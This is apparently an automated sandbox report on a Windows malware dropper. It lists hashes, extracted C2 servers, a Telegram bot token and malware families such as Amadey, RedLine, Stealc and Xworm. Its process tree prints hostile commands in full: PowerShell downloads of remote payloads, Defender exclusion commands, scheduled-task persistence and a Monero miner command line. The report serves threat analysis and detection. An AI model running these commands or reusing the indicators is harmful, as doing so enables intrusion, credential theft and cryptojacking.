Analysis

  • max time kernel
    46s
  • max time network
    157s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19-05-2024 16:25

General

  • Target

    fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31.exe

  • Size

    1.8MB

  • MD5

    a41ed1469e0fc7bb00ffba36cf6fb862

  • SHA1

    3479ae464278d392aa4555524ad7a40a5a3c2df2

  • SHA256

    fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31

  • SHA512

    9ad1009e85efef1277fafc774f36fa71be1bad4d4bebc2944a59db076592f040427fd1edcaef653159d8b9d07461ca19b4fdc1e8dbd2964980972a5c503ef21d

  • SSDEEP

    49152:6O95X9+LbTNyR9nuU9UdwaxwgNtA6erpkJayQfw6x:DFOTIRzULwgodQgfLx

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://d22hce23hy1ej9.cloudfront.net/load/th.php?a=2836&c=1002

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=458&c=1002

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=444&c=1002

Extracted

Family

amadey

Version

4.20

Botnet

c767c0

C2

http://5.42.96.7

Attributes
  • install_dir

    7af68cdb52

  • install_file

    axplons.exe

  • strings_key

    e2ce58e78f631ed97d01fe7b70e85d5e

  • url_paths

    /zamo7h/index.php

rc4.plain

Extracted

Family

redline

Botnet

1

C2

185.215.113.67:26260

Extracted

Family

stealc

Botnet

zzvv

C2

http://23.88.106.134

Attributes
  • url_path

    /c73eed764cc59dcb.php

Extracted

Family

redline

Botnet

@LOGSCLOUDYT_BOT

C2

185.172.128.33:8970

Extracted

Family

xworm

C2

127.0.0.1:7000

beshomandotestbesnd.run.place:7000

Attributes
  • Install_directory

    %ProgramData%

  • install_file

    taskmgr.exe

  • telegram

    https://api.telegram.org/bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672

Extracted

Family

redline

Botnet

Vic

C2

beshomandotestbesnd.run.place:1111

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detect Xworm Payload 2 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 6 IoCs
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

  • SectopRAT payload 2 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Xworm

    Xworm is a remote access trojan written in C#.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
  • .NET Reactor proctector 18 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 15 IoCs
  • Identifies Wine through registry keys 2 TTPs 2 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with taskkill 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31.exe
    "C:\Users\Admin\AppData\Local\Temp\fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:2236
    • C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
      "C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1164
      • C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe
        "C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:964
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          4⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:4192
          • C:\Users\Admin\AppData\Roaming\configurationValue\One.exe
            "C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:3964
          • C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe
            "C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe"
            5⤵
            • Executes dropped EXE
            PID:2428
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
            5⤵
              PID:1376
              • C:\Windows\SysWOW64\choice.exe
                choice /C Y /N /D Y /T 3
                6⤵
                  PID:3336
          • C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe
            "C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe"
            3⤵
            • Executes dropped EXE
            PID:3804
          • C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
            "C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe"
            3⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Drops file in Program Files directory
            • Suspicious use of WriteProcessMemory
            PID:4412
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:912
              • C:\Windows\SysWOW64\sc.exe
                Sc stop GameServerClient
                5⤵
                • Launches sc.exe
                PID:632
              • C:\Program Files (x86)\GameSyncLink\GameService.exe
                GameService remove GameServerClient confirm
                5⤵
                • Executes dropped EXE
                PID:2588
              • C:\Windows\SysWOW64\sc.exe
                Sc delete GameSyncLink
                5⤵
                • Launches sc.exe
                PID:2104
              • C:\Program Files (x86)\GameSyncLink\GameService.exe
                GameService remove GameSyncLink confirm
                5⤵
                • Executes dropped EXE
                PID:2484
              • C:\Program Files (x86)\GameSyncLink\GameService.exe
                GameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
                5⤵
                • Executes dropped EXE
                PID:1884
              • C:\Program Files (x86)\GameSyncLink\GameService.exe
                GameService start GameSyncLink
                5⤵
                • Executes dropped EXE
                PID:468
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "
              4⤵
                PID:1652
                • C:\Windows\SysWOW64\sc.exe
                  Sc stop GameServerClientC
                  5⤵
                  • Launches sc.exe
                  PID:4760
                • C:\Program Files (x86)\GameSyncLink\GameService.exe
                  GameService remove GameServerClientC confirm
                  5⤵
                  • Executes dropped EXE
                  PID:4208
                • C:\Windows\SysWOW64\sc.exe
                  Sc delete PiercingNetLink
                  5⤵
                  • Launches sc.exe
                  PID:2332
                • C:\Program Files (x86)\GameSyncLink\GameService.exe
                  GameService remove PiercingNetLink confirm
                  5⤵
                    PID:2448
                  • C:\Program Files (x86)\GameSyncLink\GameService.exe
                    GameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
                    5⤵
                      PID:624
                    • C:\Program Files (x86)\GameSyncLink\GameService.exe
                      GameService start PiercingNetLink
                      5⤵
                        PID:2780
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installm.bat" "
                      4⤵
                        PID:5592
                        • C:\Windows\SysWOW64\sc.exe
                          Sc delete GameSyncLinks
                          5⤵
                          • Launches sc.exe
                          PID:5916
                        • C:\Program Files (x86)\GameSyncLink\GameService.exe
                          GameService remove GameSyncLinks confirm
                          5⤵
                            PID:5340
                          • C:\Program Files (x86)\GameSyncLink\GameService.exe
                            GameService install GameSyncLinks "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
                            5⤵
                              PID:3644
                            • C:\Program Files (x86)\GameSyncLink\GameService.exe
                              GameService start GameSyncLinks
                              5⤵
                                PID:5468
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
                              4⤵
                                PID:3540
                            • C:\Users\Admin\AppData\Local\Temp\1000007001\swizzzz.exe
                              "C:\Users\Admin\AppData\Local\Temp\1000007001\swizzzz.exe"
                              3⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              • Suspicious use of WriteProcessMemory
                              PID:4808
                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                4⤵
                                • Checks processor information in registry
                                • Suspicious behavior: EnumeratesProcesses
                                PID:3684
                            • C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe
                              "C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe"
                              3⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              • Suspicious use of WriteProcessMemory
                              PID:4292
                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                4⤵
                                  PID:4808
                              • C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe
                                "C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe"
                                3⤵
                                • Executes dropped EXE
                                PID:4120
                              • C:\Users\Admin\AppData\Local\Temp\1000052001\ReurgingGleek.exe
                                "C:\Users\Admin\AppData\Local\Temp\1000052001\ReurgingGleek.exe"
                                3⤵
                                  PID:3800
                                  • C:\ProgramData\system.exe
                                    "C:\ProgramData\system.exe"
                                    4⤵
                                      PID:5972
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\system.exe'
                                        5⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        PID:3644
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'system.exe'
                                        5⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        PID:4508
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\taskmgr.exe'
                                        5⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        PID:4160
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'taskmgr.exe'
                                        5⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        PID:4708
                                      • C:\Windows\System32\schtasks.exe
                                        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "taskmgr" /tr "C:\ProgramData\taskmgr.exe"
                                        5⤵
                                        • Creates scheduled task(s)
                                        PID:4600
                                    • C:\ProgramData\build.exe
                                      "C:\ProgramData\build.exe"
                                      4⤵
                                        PID:6100
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3800 -s 1380
                                        4⤵
                                        • Program crash
                                        PID:5780
                                    • C:\Users\Admin\AppData\Local\Temp\1000065001\gold.exe
                                      "C:\Users\Admin\AppData\Local\Temp\1000065001\gold.exe"
                                      3⤵
                                        PID:624
                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                          4⤵
                                            PID:2064
                                        • C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe
                                          "C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe"
                                          3⤵
                                            PID:3248
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Newoff.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe" /F
                                              4⤵
                                              • Creates scheduled task(s)
                                              PID:5512
                                            • C:\Users\Admin\AppData\Local\Temp\1000270001\toolspub1.exe
                                              "C:\Users\Admin\AppData\Local\Temp\1000270001\toolspub1.exe"
                                              4⤵
                                                PID:6000
                                              • C:\Users\Admin\AppData\Local\Temp\1000271001\vpn-1002.exe
                                                "C:\Users\Admin\AppData\Local\Temp\1000271001\vpn-1002.exe"
                                                4⤵
                                                  PID:5180
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "cmd" /c "C:\Users\Admin\AppData\Local\Temp\nskE8A8.tmp\abc.bat"
                                                    5⤵
                                                      PID:5292
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/th.php?a=2836&c=1002','stat')"
                                                        6⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        PID:4632
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=458&c=1002','i0.exe')"
                                                        6⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        PID:5236
                                                      • C:\Users\Admin\AppData\Local\Temp\i0.exe
                                                        i0.exe /verysilent /sub=1000
                                                        6⤵
                                                          PID:5956
                                                          • C:\Users\Admin\AppData\Local\Temp\is-55NH9.tmp\i0.tmp
                                                            "C:\Users\Admin\AppData\Local\Temp\is-55NH9.tmp\i0.tmp" /SL5="$80216,2859366,899584,C:\Users\Admin\AppData\Local\Temp\i0.exe" /verysilent /sub=1000
                                                            7⤵
                                                              PID:804
                                                              • C:\Windows\system32\cmd.exe
                                                                "C:\Windows\system32\cmd.exe" "C:\Windows\system32\cmd.exe" /S /C ""C:\Program Files\Google\Chrome\Application/chrome.exe" --pack-extension=C:\Users\Admin\AppData\Local\Temp\is-00GSL.tmp\zyrtha > "C:\Users\Admin\AppData\Local\Temp\is-00GSL.tmp\~execwithresult.txt""
                                                                8⤵
                                                                  PID:60
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application/chrome.exe" --pack-extension=C:\Users\Admin\AppData\Local\Temp\is-00GSL.tmp\zyrtha
                                                                    9⤵
                                                                      PID:3876
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x108,0x10c,0x110,0xe0,0x114,0x7ffbf03f9758,0x7ffbf03f9768,0x7ffbf03f9778
                                                                        10⤵
                                                                          PID:2744
                                                                    • C:\Windows\system32\cmd.exe
                                                                      "C:\Windows\system32\cmd.exe" "C:\Windows\system32\cmd.exe" /S /C ""openssl.exe" rsa -in .\zyrtha.pem -pubout -outform DER > "C:\Users\Admin\AppData\Local\Temp\is-00GSL.tmp\~execwithresult.txt""
                                                                      8⤵
                                                                        PID:1408
                                                                      • C:\Windows\system32\cmd.exe
                                                                        "C:\Windows\system32\cmd.exe" "C:\Windows\system32\cmd.exe" /S /C ""C:\Program Files\Google\Chrome\Application/chrome.exe" --pack-extension=C:\Users\Admin\AppData\Local\Temp\is-00GSL.tmp\cwntfn > "C:\Users\Admin\AppData\Local\Temp\is-00GSL.tmp\~execwithresult.txt""
                                                                        8⤵
                                                                          PID:4344
                                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                                          "taskkill.exe" /f /im "msedge.exe"
                                                                          8⤵
                                                                          • Kills process with taskkill
                                                                          PID:5164
                                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                                          "taskkill.exe" /f /im "chrome.exe"
                                                                          8⤵
                                                                          • Kills process with taskkill
                                                                          PID:5896
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=444&c=1002', 'i2.bat')"
                                                                      6⤵
                                                                      • Command and Scripting Interpreter: PowerShell
                                                                      PID:556
                                                              • C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe"
                                                                3⤵
                                                                  PID:5740
                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                    4⤵
                                                                      PID:5396
                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                      4⤵
                                                                        PID:5364
                                                                • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                  "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                                                  1⤵
                                                                  • Executes dropped EXE
                                                                  PID:700
                                                                  • C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
                                                                    "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
                                                                    2⤵
                                                                      PID:4208
                                                                      • C:\Windows\Temp\952277.exe
                                                                        "C:\Windows\Temp\952277.exe" --list-devices
                                                                        3⤵
                                                                          PID:1480
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4064 --field-trial-handle=2236,i,5367110156796017614,12594004256180761011,262144 --variations-seed-version /prefetch:3
                                                                      1⤵
                                                                        PID:2092
                                                                      • C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                                                                        1⤵
                                                                          PID:4760
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3496 --field-trial-handle=2236,i,5367110156796017614,12594004256180761011,262144 --variations-seed-version /prefetch:8
                                                                          1⤵
                                                                            PID:4164
                                                                          • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                            "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                                                            1⤵
                                                                              PID:3252
                                                                              • C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
                                                                                "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
                                                                                2⤵
                                                                                  PID:5064
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 3800 -ip 3800
                                                                                1⤵
                                                                                  PID:6140
                                                                                • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                  "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                                                                  1⤵
                                                                                    PID:4468
                                                                                    • C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
                                                                                      "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
                                                                                      2⤵
                                                                                        PID:5732
                                                                                        • C:\Windows\Temp\12854.exe
                                                                                          "C:\Windows\Temp\12854.exe" --http-port 14343 -o xmr.2miners.com:2222 -u 83dQM82bj4yY83XKGKHnbHTzqgY4FUt2pi1JS15u7rTs8v84mTU5ny5MiRoSeyduBUAQKFZ6MsvbMHYTisNeThDM3BqQ59y --coin XMR -t 1 --no-color -p x
                                                                                          3⤵
                                                                                            PID:5856
                                                                                      • C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                                                                                        1⤵
                                                                                          PID:464
                                                                                        • C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe
                                                                                          1⤵
                                                                                            PID:4236
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EDA2.bat" "
                                                                                            1⤵
                                                                                              PID:1176
                                                                                              • C:\Windows\system32\reg.exe
                                                                                                reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
                                                                                                2⤵
                                                                                                  PID:4592
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6F7.bat" "
                                                                                                1⤵
                                                                                                  PID:5504
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
                                                                                                    2⤵
                                                                                                      PID:2304

                                                                                                  Network

                                                                                                  MITRE ATT&CK Matrix ATT&CK v13

                                                                                                  Execution

                                                                                                  Command and Scripting Interpreter

                                                                                                  1
                                                                                                  T1059

                                                                                                  PowerShell

                                                                                                  1
                                                                                                  T1059.001

                                                                                                  System Services

                                                                                                  1
                                                                                                  T1569

                                                                                                  Service Execution

                                                                                                  1
                                                                                                  T1569.002

                                                                                                  Scheduled Task/Job

                                                                                                  1
                                                                                                  T1053

                                                                                                  Persistence

                                                                                                  Create or Modify System Process

                                                                                                  1
                                                                                                  T1543

                                                                                                  Windows Service

                                                                                                  1
                                                                                                  T1543.003

                                                                                                  Scheduled Task/Job

                                                                                                  1
                                                                                                  T1053

                                                                                                  Privilege Escalation

                                                                                                  Create or Modify System Process

                                                                                                  1
                                                                                                  T1543

                                                                                                  Windows Service

                                                                                                  1
                                                                                                  T1543.003

                                                                                                  Scheduled Task/Job

                                                                                                  1
                                                                                                  T1053

                                                                                                  Defense Evasion

                                                                                                  Virtualization/Sandbox Evasion

                                                                                                  2
                                                                                                  T1497

                                                                                                  Impair Defenses

                                                                                                  1
                                                                                                  T1562

                                                                                                  Credential Access

                                                                                                  Unsecured Credentials

                                                                                                  1
                                                                                                  T1552

                                                                                                  Credentials In Files

                                                                                                  1
                                                                                                  T1552.001

                                                                                                  Discovery

                                                                                                  Query Registry

                                                                                                  6
                                                                                                  T1012

                                                                                                  Virtualization/Sandbox Evasion

                                                                                                  2
                                                                                                  T1497

                                                                                                  System Information Discovery

                                                                                                  4
                                                                                                  T1082

                                                                                                  Collection

                                                                                                  Data from Local System

                                                                                                  1
                                                                                                  T1005

                                                                                                  Command and Control

                                                                                                  Web Service

                                                                                                  1
                                                                                                  T1102

                                                                                                  Impact

                                                                                                  Service Stop

                                                                                                  1
                                                                                                  T1489

                                                                                                  Replay Monitor

                                                                                                  Loading Replay Monitor...

                                                                                                  Downloads

                                                                                                  • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                    Filesize

                                                                                                    288KB

                                                                                                    MD5

                                                                                                    d9ec6f3a3b2ac7cd5eef07bd86e3efbc

                                                                                                    SHA1

                                                                                                    e1908caab6f938404af85a7df0f80f877a4d9ee6

                                                                                                    SHA256

                                                                                                    472232ca821b5c2ef562ab07f53638bc2cc82eae84cea13fbe674d6022b6481c

                                                                                                    SHA512

                                                                                                    1b6b8702dca3cb90fe64c4e48f2477045900c5e71dd96b84f673478bab1089febfa186bfc55aebd721ca73db1669145280ebb4e1862d3b9dc21f712cd76a07c4

                                                                                                  • C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
                                                                                                    Filesize

                                                                                                    2.5MB

                                                                                                    MD5

                                                                                                    e6943a08bb91fc3086394c7314be367d

                                                                                                    SHA1

                                                                                                    451d2e171f906fa6c43f8b901cd41b0283d1fa40

                                                                                                    SHA256

                                                                                                    aafdcfe5386452f4924cfcc23f2cf7eccf3f868947ad7291a77b2eca2af0c873

                                                                                                    SHA512

                                                                                                    505d3c76988882602f06398e747c4e496ecad9df1b7959069b87c8111c4d9118484f4d6baef5f671466a184c8caec362d635da210fa0987ccb746cbeea218d2a

                                                                                                  • C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
                                                                                                    Filesize

                                                                                                    13.2MB

                                                                                                    MD5

                                                                                                    72b396a9053dff4d804e07ee1597d5e3

                                                                                                    SHA1

                                                                                                    5ec4fefa66771613433c17c11545c6161e1552d5

                                                                                                    SHA256

                                                                                                    d0b206f0f47a9f8593b6434dc27dadde8480a902e878882fa8c73fc7fe01b11d

                                                                                                    SHA512

                                                                                                    ad96c9ca2feae7af7fcf01a843d5aa6cbdde0520d68dedff44554a17639c6c66b2301d73daf272708cb76c22eae2d5c89db23af45105c4f0e35f4787f98e192b

                                                                                                  • C:\Program Files (x86)\GameSyncLink\installc.bat
                                                                                                    Filesize

                                                                                                    301B

                                                                                                    MD5

                                                                                                    998ab24316795f67c26aca0f1b38c8ce

                                                                                                    SHA1

                                                                                                    a2a6dc94e08c086fe27f8c08cb8178e7a64f200d

                                                                                                    SHA256

                                                                                                    a468b43795f1083fb37b12787c5ff29f8117c26ac35af470084e00c48280442e

                                                                                                    SHA512

                                                                                                    7c9c2ade898a8defb6510ddd15730bec859d4474071eb6b8e8738ea6089764f81924ad2a6ebf0479d4fed7d61890edaa38f4bfbf70a4e6b30d33aa5bfc5b5c75

                                                                                                  • C:\Program Files (x86)\GameSyncLink\installg.bat
                                                                                                    Filesize

                                                                                                    284B

                                                                                                    MD5

                                                                                                    5dee3cbf941c5dbe36b54690b2a3c240

                                                                                                    SHA1

                                                                                                    82b9f1ad3ca523f3794e052f7e67ecdcd1ae87e1

                                                                                                    SHA256

                                                                                                    98370b86626b8fd7a7cac96693348045b081326c49e2421113f49a5ea3588edb

                                                                                                    SHA512

                                                                                                    9ee431d485e2f09268a22b287b0960859d2f22db8c7e61309a042999c436b3de74f5d75837b739e01122a796ad65bc6468d009ec6ddf4962f4ff288155410556

                                                                                                  • C:\Program Files (x86)\GameSyncLink\installm.bat
                                                                                                    Filesize

                                                                                                    218B

                                                                                                    MD5

                                                                                                    94b87b86dc338b8f0c4e5869496a8a35

                                                                                                    SHA1

                                                                                                    2584e6496d048068f61ac72f5c08b54ad08627c3

                                                                                                    SHA256

                                                                                                    2928d8e9a41f39d3802cfd2900d8edeb107666baa942d9c0ffbfd0234b5e5bfc

                                                                                                    SHA512

                                                                                                    b67eb73fe51d4dba990789f1e0123e902dac6d26569851c3d51ca0a575221ce317f973999d962669016017d8f81a01f11bd977609e66bb1b244334bce2db5d5d

                                                                                                  • C:\ProgramData\build.exe
                                                                                                    Filesize

                                                                                                    95KB

